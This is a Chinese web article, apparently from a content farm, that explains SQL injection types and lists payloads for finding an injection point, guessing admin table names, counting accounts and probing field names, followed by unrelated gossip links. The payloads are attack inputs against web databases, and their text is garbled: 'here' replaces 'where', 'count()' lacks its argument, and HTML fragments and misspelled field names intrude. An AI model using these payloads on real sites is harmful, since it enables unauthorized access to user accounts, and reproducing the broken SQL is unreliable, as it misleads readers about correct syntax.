sql注入语句
sql注入语句是怎样的呢?下面就让我们一起来了解一下吧
sql注入语句其实可以分为三种的,即数字型注入点,语句一般是“select from表名here id=1 and 1=1”;字符型注入点,语句一般是“select from表名here name...”;搜索型注入点。
而sql注入也就是通过将SQL命令插入到Web表单提交或是输入域名、页面请求的查询字符串,最终可以达到欺骗服务器执行恶意的SQL命令。
sql注入类型通常是可以按照不同方式进行分类的,比如若是按照注入点类型来进行分类可以分为数字型注入点、字符型注入点、搜索型注入点,若是按照数据提交的方式来分类,可以分为GET 注入、POST 注入、Cookie 注入、HTTP 头部注入。
也可以按照执行效果来分类,可以分为基于布尔的盲注、基于时间的盲注、基于报错注入、联合查询注入。
其中常用的语句有
1、判断有无注入点
; and 1=1 and 1=2
2、猜表 通常表的名称基本上是admin adminuser user pass passord 等..
and 0<>(select count() from )
and 0<>(select count() from admin) ---判断是否存在admin这张表
3、猜帐号数目 若是遇到0< 返回正确页面 1<返回错误页面那么就说明帐号数目就是1个
and 0<(select count() from admin)
and 1<(select count() from admin)
4、猜解字段名称 在len()括号里面可以加上所想到的字段名称。
and 1=(select count() from admin here len()>0)--
and 1=(select count() from admin here len(用户字段名称name)>0)
and 1=(select count() from admin here len(_blank>密码字段名称passord)>0)
以上就是趣谈网小编的分享了,希望能够帮助到大家。
怪事奇闻
- 全球奇闻异事未解之谜网 世界奇闻网
- 全球奇闻异事未解之谜 全球奇闻异事未解之谜在
- 全球公认的十大灵异事件 震惊全球十大灵异事件
- 全国真实灵异事件 全国真实灵异事件最新
- 亲身经历的真实灵异事件 经历的灵异事件绝对真
- 亲身经历的真实灵异故事 亲身经历的真实灵异故
- 乔四爷玩过的女人 乔四爷原名
- 敲门一般敲几下是鬼 敲门一般敲几下是鬼是真的
- 起死回生的主人公是谁 起死回生的典故主人公
- 奇闻异事文案素材1000例 民间故事奇闻异事
- 每日趣闻趣事新闻 新闻趣事日记
- 每日奇闻趣事小故事 奇闻趣事2021
- 罗布泊双鱼玉佩事件 罗布泊双鱼玉佩事件潜艇什
- 柳岩婚礼发生了什么 柳岩参加婚礼事件
- 刘伯温预言难过猪鼠年 刘伯温预言准吗
- 灵异之校园鬼魂 灵异之校园鬼魂小说